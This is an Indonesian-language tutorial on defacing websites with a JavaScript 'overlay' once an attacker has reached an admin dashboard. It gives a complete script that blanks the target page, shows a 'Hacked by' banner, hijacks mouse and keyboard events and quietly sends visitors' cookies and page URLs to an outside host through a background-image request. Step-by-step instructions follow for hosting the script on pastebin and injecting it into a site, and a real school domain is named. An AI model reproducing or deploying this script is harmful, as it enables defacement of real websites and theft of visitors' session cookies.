Tutorial Deface with JS Overlay (JSO)

Pengertian Overlay sendiri di dalam dunia Blogging adalah teknik untuk memfokuskan pengunjung pada suatu elemen tertentu dengan cara menutupi konten utama dan menampilkan konten yang menjadi fokus utama. Bisa dikatakan kita menutupi sebuah halaman dengan script overlay tersebut.

Didalam dunia hacking sendiri JS Overlay bisa membantu kita ketika ingin mendeface suatu Website nampun sering kali gagal dala meng-upload sebuah backdoor, Teknik ini bisa mejadi salah satu solusinya.

Langsung saja ke tahap eksekusi. Saya anggap kalian sudah memiliki target website vuln yang ingin di eksekusi dengan JSO ini dengan persyaratan kalian sudah memasuki halaman dashboard Administrator.

Untuk script Javascript Overlay nya :

/*
<style>html,body{color:#ffffff}</style><font color='white'><script>top.location.href='http://www.google.com/?v=wall/'</script><noscript><META HTTP-EQUIV="refresh" CONTENT="0;URL=http://www.facebook.com/?v=wall/">
*/
document.getElementsByTagName('body')[0].innerHTML=""
document.title="Hacked by Ngapak Crew"
var shortc=document.createElement("link");shortc.rel="SHORTCUT ICON";shortc.href="http://i.imgur.com/QYUFm5u.png";document.getElementsByTagName("head")[0].appendChild(shortc)
function muter2(){
scrW=screen.availWidth
scrH=screen.availHeight
window.moveTo(0,0)
window.resizeTo(10,10)
window.focus()
for(x=0;x<80;x++){
window.resizeTo(10,scrH*x/80)
}
for(y=0;y<80;y++){
window.resizeTo(scrW*y/80,scrH)
}
window.resizeTo(scrW,scrH)
}
document.oncontextmenu=new Function("muter2();return false");
function keypressed(){alert("hei admin.. you were hacked");}
document.onkeydown=keypressed;
function kasih_tau(){
alert('Hacked by Ngapak Crew');
}
if(location.href.indexOf('sman2bangkalan.sch.id')==-1)setTimeout("alert('hei admin.. you were hacked');",3000);
else setTimeout("kasih_tau()",3000);
if(navigator.userAgent.indexOf('MSIE')!=-1){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://bacot.today/bacot.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
}
else{
if(document.getElementsByTagName('body')[0].style.cssText.indexOf('hack')==-1){
//muter2();
log="";
if(document.cookie!=""&&location.href.indexOf('ayodance.com')==-1){x=escape(document.cookie);v=escape(location.href);y="1337@null.net";log=";background-image:url(http://crazydavinci.net/riper.php?o="+escape(x)+"&v="+escape(v)+"&y="+escape(y)+")";document.cookie="PHPSESSID=!Bagsfreakz Here!;path=/";}
document.getElementsByTagName('body')[0].style.cssText="background-color:black"+log
window.onload=function(){
document.getElementsByTagName('body')[0].innerHTML="<center><iframe src='https://bacot.today/bacot.html' height='620px' width='1100px' scrolling='no' frameborder='0'></center>";
document.getElementsByTagName('body')[0].style.cssText="background-color:#ffffff;background-image:url(http://www.balikita.net/)!important;";
}
}
}

Copast semua script di atas, kemudian paste di dalam pastebin.com, dan jangan lupa ganti kalimat Hacked by Ngapak Crew dengan Nick kalian. dan ganti url https://bacot.today/bacot.html dengan page halaman yang sudah kalian siapkan untuk menutupi halaman target/web korban.

Pada halaman dashboard kalian edit, biasanya dibagian main, slider, news ataupun halaman yang lainya. dengan script dibawah ini

<script type="text/javascript" src="https://pastebin.com/raw/UeU73MLZ"></script>

untuk https://pastebin.com/raw/UeU73MLZ  ganti dengan script pastebin yang sudah kalian buat di atas ok

Berikut cuplikan videonya tutorial Deface dengan teknik JSO :